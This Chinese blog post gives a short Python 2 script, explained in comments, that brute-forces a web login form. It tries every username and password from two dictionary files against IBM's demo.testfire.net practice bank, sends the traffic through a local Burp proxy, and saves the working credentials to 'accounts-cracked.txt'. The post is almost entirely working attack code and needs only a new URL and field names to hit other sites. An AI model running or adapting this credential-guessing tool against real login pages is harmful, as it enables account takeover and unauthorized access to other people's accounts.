使用 python 的 urllib2和 urllib模块爆破 form 表单的简易脚本
python 的 http 中 urllib2和 urllib模块在web 表单爆破的使用方法python
脚本中还增长了 urllib2和 urllib模块如何添加代理的方法web
# -*- coding: utf-8 -*-
import urllib2
import urllib
import time
def brute_force(user, password):
#strip() 方法用于移除字符串头尾指定的字符(默认为空格)
name = user.strip()
passwd = password.strip()
#添加代理:本地8080端口的代理是 burp 工具,主要是查看脚本发包回包的状况,好定位问题
proxy = urllib2.ProxyHandler({"http":'http://127.0.0.1:8080'})
opener = urllib2.build_opener(proxy)
urllib2.install_opener(opener)
#IBM 公司的一个 测试网站
url1 = "http://demo.testfire.net/bank/login.aspx"
user_agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
headers = {"User-Agent":user_agent,"Content-Type": "application/x-www-form-urlencoded", "Referer": "http://demo.testfire.net/bank/login.aspx"}
values = {'uid': name, 'passw': passwd,'btnSubmit':'Login'}
data = urllib.urlencode(values)#能够把key-value这样的键值对转换成咱们想要的格式,返回的是a=1&b=2这样的字符串
request = urllib2.Request(url1,data,headers)
response = urllib2.urlopen(request)
url2 = response.geturl()
time.sleep(3)
if url2 != url1:
#由于urllib2 返回的页面若是存在302重定向,返回的页面是重定向以后的页面,因此不能以302状态码来判断是否登陆成功,
#由于重定向以后的页面访问成功是200,不是302;因此以返回的页面是否是发生变化来判断是不是否登陆成功。
print '---- find user:', name, ' with password:',passwd, '-----'
print url2
outFile.write(name + ':' + passwd+'\n' )
else:
print '----- error user:', name, ' with password:',passwd, '-----'
print url2
response.close()
return
outFile = open('accounts-cracked.txt', 'w')
if __name__ == '__main__':
#导入用户名字典
with open('user.dic', 'r') as userline:
y = userline.readlines()
#导入密码的字典
with open('pass.dic', 'r') as passline:
b= passline.readlines()
for u in y:
for p in b:
brute_force(user=u,password=p)
outFile.close()
with open('accounts-cracked.txt','r') as text:
list = text.readlines()
sum=len(list)
if sum>0:
print "找到",sum,"个帐号密码"
else:
print "All thread OK,maybe not "
输入有点丑,将就用下
app
相关文章
- 1. 使用 python 的httplib模块爆破 form 表单的简易脚本
- 2. Python的urllib和urllib2模块
- 3. python-urllib/urllib2模块
- 4. python-35:urllib 和 urllib2 模块
- 5. [python]-urllib和urllib2模块
- 6. python中urllib和urllib2的简单用法
- 7. urllib模块和urllib2模块的区别
- 8. Python urllib和urllib2模块学习(一)
- 9. python之HTTP处理模块urllib和urllib2
- 10. urllib,urllib2的使用
- 更多相关文章...
- • Lua 模块与包 - Lua 教程
- • XSD 简易元素 - XML Schema 教程
- • Git可视化极简易教程 — Git GUI使用方法
- • TiDB 在摩拜单车在线数据业务的应用和实践
相关标签/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
欢迎关注本站公众号,获取更多信息
相关文章